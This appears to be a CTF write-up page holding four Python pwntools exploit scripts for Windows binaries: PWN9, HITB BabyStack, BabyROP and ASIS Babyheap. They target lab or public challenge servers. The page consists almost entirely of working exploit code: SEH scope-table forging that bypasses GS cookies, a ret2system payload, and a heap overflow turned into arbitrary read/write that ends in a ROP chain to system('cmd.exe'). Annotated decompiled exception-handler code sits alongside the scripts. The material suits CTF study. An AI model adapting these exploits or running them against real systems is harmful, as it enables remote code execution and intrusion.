winpwn

[Windows][第五空间2019 决赛]PWN9
exp:

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

# context.log_level = 'debug'
context.arch = 'i386'

# Target service; 192.168.0.100 is a private-network address, i.e. the
# author's own lab copy of the challenge.
p = remote('192.168.0.100', 2222)
# Leak helpers: read until a high address byte (0x7f / 0xf7), keep the
# trailing 6 / 4 bytes and zero-pad them before unpacking.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# I/O shorthands shared by all scripts on this page; sla/sa/ru coerce their
# arguments with str().  Only ru and lg are actually used in this script.
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)   # log a value in hex
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def get_value(address):
    """Return the integer the program reports for *address*.

    Drives the program's read-back dialogue: answers 'yes' to the
    'Do you want to know more?' prompt, supplies the address, and parses the
    hexadecimal number printed after 'value is ' (up to the newline).
    """
    sla('Do you want to know more?', 'yes')
    sla('Where do you want to know', address)
    ru('value is ')
    hex_text = p.recvuntil('\n', drop=True)
    return int(hex_text, 16)
"""
void __cdecl ValidateLocalCookies(void (__fastcall *cookieCheckFunction)(unsigned int), _EH4_SCOPETABLE *scopeTable, char *framePointer)
{
    unsigned int v3; // esi@2
    unsigned int v4; // esi@3

    if ( scopeTable->GSCookieOffset != -2 )
    {
        v3 = *(_DWORD *)&framePointer[scopeTable->GSCookieOffset] ^ (unsigned int)&framePointer[scopeTable->GSCookieXOROffset];
        __guard_check_icall_fptr(cookieCheckFunction);
        ((void (__thiscall *)(_DWORD))cookieCheckFunction)(v3);
    }
    v4 = *(_DWORD *)&framePointer[scopeTable->EHCookieOffset] ^ (unsigned int)&framePointer[scopeTable->EHCookieXOROffset];
    __guard_check_icall_fptr(cookieCheckFunction);
    ((void (__thiscall *)(_DWORD))cookieCheckFunction)(v4);
}

int __cdecl _except_handler4_common(unsigned int *securityCookies, void (__fastcall *cookieCheckFunction)(unsigned int), _EXCEPTION_RECORD *exceptionRecord, unsigned __int32 sehFrame, _CONTEXT *context)
{
    // 异或解密 scope table
    scopeTable_1 = (_EH4_SCOPETABLE *)(*securityCookies ^ *(_DWORD *)(sehFrame + 8));

    // sehFrame 等于 上图 ebp - 10h 位置, framePointer 等于上图 ebp 的位置
    framePointer = (char *)(sehFrame + 16);
    scopeTable = scopeTable_1;

    // 验证 GS
    ValidateLocalCookies(cookieCheckFunction, scopeTable_1, (char *)(sehFrame + 16));
    __except_validate_context_record(context);

    if ( exceptionRecord->ExceptionFlags & 0x66 )
    {
        ......
    }
    else
    {
        exceptionPointers.ExceptionRecord = exceptionRecord;
        exceptionPointers.ContextRecord = context;
        tryLevel = *(_DWORD *)(sehFrame + 12);
        *(_DWORD *)(sehFrame - 4) = &exceptionPointers;
        if ( tryLevel != -2 )
        {
            while ( 1 )
            {
                v8 = tryLevel + 2 * (tryLevel + 2);
                filterFunc = (int (__fastcall *)(_DWORD, _DWORD))*(&scopeTable_1->GSCookieXOROffset + v8);
                scopeTableRecord = (_EH4_SCOPETABLE_RECORD *)((char *)scopeTable_1 + 4 * v8);
                encloseingLevel = scopeTableRecord->EnclosingLevel;
                scopeTableRecord_1 = scopeTableRecord;
                if ( filterFunc )
                {
                    // 调用 FilterFunc
                    filterFuncRet = _EH4_CallFilterFunc(filterFunc);
                    ......
                    if ( filterFuncRet > 0 )
                    {
                        ......
                        // 调用 HandlerFunc
                        _EH4_TransferToHandler(scopeTableRecord_1->HandlerFunc, v5 + 16);
                        ......
                    }
                }
                ......
                tryLevel = encloseingLevel;
                if ( encloseingLevel == -2 )
                    break;
                scopeTable_1 = scopeTable;
            }
            ......
        }
    }
  ......
}
"""
ru("= 0x")
stack = int(p.recvuntil("\n")[:-1],16)
lg("stack",stack)
ru("= 0x")
main_addr = int(p.recvuntil("\n")[:-1],16)
lg("main_addr",main_addr)
security_cookie = get_value(main_addr+0x404004-0x4010b0)
# lg("security_cookie_addr",main_addr+0x404004-0x4010b0)
lg("security_cookie",security_cookie)
scopetable = stack+0x94
lg("scopetable",scopetable)
excepthandler = stack+0x90
next_ptr = get_value(stack+0x90-0x4)
lg("next_ptr",next_ptr)
ExceptionHandler = main_addr+0x1460-0x10b0
lg("ExceptionHandler",ExceptionHandler)

backdoor = main_addr-0x10b0+0x138D
fake_scope = [
    0x0FFFFFFEc, # GSCookieOffset -0x14
    0,           # GSCookieXOROffset
    0x0FFFFFF20, # EHCookieOffset #-224
    0,           # EHCookieXOROffset 
    0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
    backdoor     # ScopeRecord.FilterFunc
]
ebp = stack+0x9c
fake_scope_addr = stack+0x10
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^security_cookie)
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^security_cookie) #scopetable
payload += p32(0) #try_level

p.recvuntil('Do you want to know more?')
p.sendline('nooo')
p.sendline(payload)
p.recvuntil('Do you want to know more?')
p.sendline('yes')
p.recvuntil('Where do you want to know')
p.sendline('0')
p.interactive()

[Windows][HITB GSEC]BABYSTACK

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

# Public challenge instance (BUUOJ).
p = remote('node3.buuoj.cn',27300)
# Same helper template as the other scripts on this page; sla, lg, sl and
# ru are the ones used here.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)   # log a value in hex
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
# The banner prints two hex numbers (a stack address, then main).  Output
# lines end in "\r\n", so each number is read up to '\r'.
ru("0x")
stack = int(p.recvuntil('\r')[:-1],16)
lg("stack",stack)
ru("0x")
main = int(ru("\r")[:-1],16)
lg("main",main)
def getaddr(addr):
    """Return the integer the program reports for *addr*.

    Answers "yes" to the OtherwhereWillBeTheAnswer prompt, sends the
    address, and parses the hex digits printed after "is 0x" (the line is
    terminated by '\r').
    """
    p.sendlineafter("OtherwhereWillBeTheAnswer\r\n", "yes")
    p.sendlineafter("Where do you want to know\r\n", str(addr))
    p.recvuntil("is 0x")
    digits = p.recvuntil('\r')[:-1]
    return int(digits, 16)
# Security cookie, read at a fixed offset from main (image offsets 0x164004
# and 0x1610b0); getaddr() serves as an arbitrary read.
cookie = getaddr(main-0x1610b0+0x164004)
lg("cookie",cookie)
# Frame bookkeeping relative to the leaked stack pointer.  The existing SEH
# handler and "next" pointers are read back so they can be replayed
# unchanged; try_level is computed but not used below.
ebp = stack+0x9c
try_level = ebp-0x4
ExceptionHandler = getaddr(ebp-0xc)
lg("ExceptionHandler",ExceptionHandler)
next_ptr = getaddr(ebp-0x10)
lg("next_ptr",next_ptr)
backdoor = main+0x16138D-0x1610B0   # image offset 0x16138D; used as FilterFunc
lg("backdoor_addr",backdoor)
# Forged _EH4_SCOPETABLE, same shape as in the PWN9 script above: cookie
# offsets pointing back into the frame, one record with EnclosingLevel -2
# whose FilterFunc is backdoor.
fake_scope = [
    0x0FFFFFFEc, # GSCookieOffset -0x14
    0,           # GSCookieXOROffset
    0x0FFFFFF20, # EHCookieOffset #-224
    0,           # EHCookieXOROffset 
    0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
    backdoor     # ScopeRecord.FilterFunc
]
fake_scope_addr = stack+0x10   # the table follows the 0x10 filler bytes
# Frame image: filler, fake table, padding to 0x88, cookie^ebp, then the SEH
# record (next, handler, scopetable^cookie, trylevel).
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^cookie)                   # presumably the frame's cookie slot
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^cookie) #scopetable
payload += p32(0) #try_level
# Decline the read dialogue so the next line goes into the overflowable
# buffer; the author left the getaddr(0) trigger commented out.
sla("OtherwhereWillBeTheAnswer\r\n","no")
sl(payload)
# getaddr(0)
p.interactive()

[Windows][Others]BabyROP

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

# Public BUUOJ instance; the commented line is the author's lab copy.
p = remote('node3.buuoj.cn',26336)
# p = remote("192.168.0.104",7777)
# Helper template shared with the other scripts; only lg is used here.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)   # log a value in hex
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
# Send a 24-byte name and take the 4 bytes the program echoes right after
# it -- presumably the echo runs past an unterminated name buffer, leaking a
# pointer into the CRT.
p.recvuntil("name")
p.sendline("A"*24)
p.recvuntil("A"*24)
crt = p.recv(4)
msvcr_base = u32(crt) - 0x16e2d       # leaked pointer is at image offset 0x16e2d
lg("msvcr_base",msvcr_base)
system_address = msvcr_base + 0x62632 # system (see the author's notes below)
cmd_address = msvcr_base + 0x43030    # string used as system's argument

# 0xCC filler + 4 bytes of saved frame pointer, then the overwritten return
# slot: system_address, a dummy return address (0xdeadbeaf) and the
# argument pointer.
payload = "A"*0xCC+"AAAA"+p32(system_address)+p32(0xdeadbeaf)+p32(cmd_address)

# The program asks for the message length before the message; the script
# reports the full payload size, so presumably the length is trusted rather
# than bounded by the buffer.
p.recvuntil("input your message length")
p.sendline(str(len(payload)))
p.sendline(payload)
p.interactive()
#78ABD04D
#78B02632 system

[Windows][ASIS 2017]Babyheap

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

# context.log_level = 'debug'
context.arch = 'i386'

# The commented line is the public BUUOJ instance; the active one is the
# author's lab copy.
# p = remote('node3.buuoj.cn',29886)
p = remote("192.168.0.104",2222)
# Helper template shared with the other scripts on this page.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)   # log a value in hex
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
# The banner prints an address at image offset 0x1090; subtracting it gives
# the module base, which defeats the image's ASLR for the rest of the script.
ru("0x")
codebase = int(ru("\r")[:-1],16)-0x1090
lg("codebase",codebase)
def cmd(idx):
    """Select menu entry *idx* at the "choice?" prompt."""
    p.sendlineafter("choice?\r\n", str(idx))
def add(size,payload):
    """Menu 1: create a sword of *size* bytes whose content is *payload*."""
    p.sendlineafter("choice?\r\n", "1")
    p.sendlineafter("sword?\r\n", str(size))
    p.sendlineafter("it!\r\n", str(payload))
def edit(index, size, content):
    """Menu 3: rewrite sword *index* with *size* bytes from *content*.

    The data itself goes through sendafter, not sendlineafter, so no newline
    is appended; callers add their own '\n' when the program expects one.
    """
    cmd(3)
    sla('polish?\r\n', index)
    sla('time?\r\n', size)
    p.sendafter('again : \r\n', content)
def free(idx):
    """Menu 2: destroy sword *idx*."""
    p.sendlineafter("choice?\r\n", "2")
    p.sendlineafter('Which sword do you want to destroy?\r\n', str(idx))
def show(idx):
    """Menu 4: print the content of sword *idx*."""
    p.sendlineafter("choice?\r\n", "4")
    p.sendlineafter('Which one will you check?\r\n', str(idx))
# Six 0x58-byte swords, indices 0..5.
for i in range(6):
    add(0x58, 'a'*0x20)

free(2)
# Fill sword 1 completely so show(1) prints past its end; the 8 bytes that
# follow (presumably the header of the freed sword 2) are captured as header.
# This disclosure is what the rest of the script is built on.
edit(1,0x58,"a"*0x58+'\n')
show(1)
ru("a"*0x58)
header = u64(ru("\r")[:-1].ljust(8,"\x00"))
lg("header",header)
addr = codebase+0x4370     # image offset 0x4370; appears to be the sword pointer table (see the edit(0)/show(1) pairs below)
addr2 = codebase+0x43bc    # image offset 0x43bc
# heaader = ru("S")[:-1]
# edit(1,0x58+0x8,"a"*0x58+p64(header)+'\n')
free(4)
# Overflow from sword 1 into the freed sword 2: keep its header and replace
# the two words after it with addr+4 / addr+8.
edit(1, 0x58 + 8 + 8, 'b' * 0x58 + p64(header) + p32(addr + 4) + p32(addr + 8) + '\n')
free(1)
# Hidden menu 1337 takes a "target" address.
p.sendlineafter('choice?\r\n', '1337')
p.sendlineafter('target?\r\n', str(addr2+0x2))
# From here on editing sword 2 appears to rewrite the table at addr, i.e. the
# pointers show()/edit() use for the other swords.
payload = p32(addr2)+p32(addr)+p32(codebase+0x30c8)#4
payload += p32(0x300C+codebase)
edit(2,len(payload),payload+'\n')
edit(2,6,"\x01"*6+'\n')
# show(4)/show(5) now print 4 bytes from image offsets 0x30c8 / 0x300c:
# pointers into ucrtbase and ntdll, converted to module bases.
show(4)
ru("how : ")
ucrtbase = u32(p.recv(4))-0xB89F0
lg("ucrtbase",ucrtbase)
sys_addr = 0xEFDA0+ucrtbase   # system in ucrtbase
cmd_addr = 0x15084+ucrtbase   # computed but not used below
show(5)
ru("how : ")
ntdll_base = u32(p.recv(4))-0x44160
lg("ntdll_base",ntdll_base)
# Read a stack pointer through ntdll (offset 0x120c40, named PebLdr by the
# author), then a second one through the first; only 3 bytes are taken each
# time and zero-extended.
ntdll_PedLdr_addr = ntdll_base+0x120c40
addr3 = ntdll_PedLdr_addr-0x34
edit(3,8,p32(addr)+p32(addr3)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,"\x00"))-0x21c+0x3000
# lg("stack_addr",stack_addr)
edit(0,8,p32(addr)+p32(stack_addr)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,'\x00'))
lg("stack_addr",stack_addr)
# Guess a page-aligned base near the leaked stack address, then scan 40
# dwords from +60*4 for the value codebase+0x193B (the return address being
# looked for).  Each step points sword 1 at the candidate slot and reads it
# back through show(1).
ret_addr = stack_addr & 0xffff00
ret_addr = ret_addr+0x5c
lg("ret_addr",ret_addr)
ret_addr_content = 0x193B+codebase
for i in range(60,100):
    edit(0,8,p32(addr)+p32(ret_addr+i*4)+'\n')
    show(1)
    ru("how : ")
    ss = u32(p.recv(3).ljust(4,'\x00'))
    print i
    # print "["+str(hex(ret_addr+i*4)) + "] :" + str(hex(ss))
    if ss == ret_addr_content:
        log.success("Success Found!")
        ret_addr = ret_addr+i*4
        break
# NOTE: if no slot matched, ret_addr still holds the guessed base and the
# writes below go to the wrong place; the loop does not report that case.
lg("ret_addr",ret_addr)
# Table entries: sword 0 -> addr, sword 1 -> ret_addr, and "cmd.exe" stored
# at addr+8.
s1 = p32(addr)+p32(ret_addr)+"cmd.exe\x00"
edit(0,len(s1),s1+'\n')
# show(1)
# ru("how : ")
# ss = u32(p.recv(3).ljust(4,'\x00'))
# lg("ss",ss)
# edit(0,8,p32(addr)+p32(ret_addr)+'\n')
# 16 bytes written at ret_addr via sword 1: sys_addr, a return address in
# the image (offset 0x21AF), the argument pointer (addr+8, the string above)
# and a zero.
payload = [
    sys_addr,
    codebase+0x21AF,
    addr+0x4+0x4,
    0,

]

edit(1,16,flat(payload)+'\n')

# Menu 5 -- presumably the exit path that returns through the rewritten slot.
cmd(5)
p.interactive()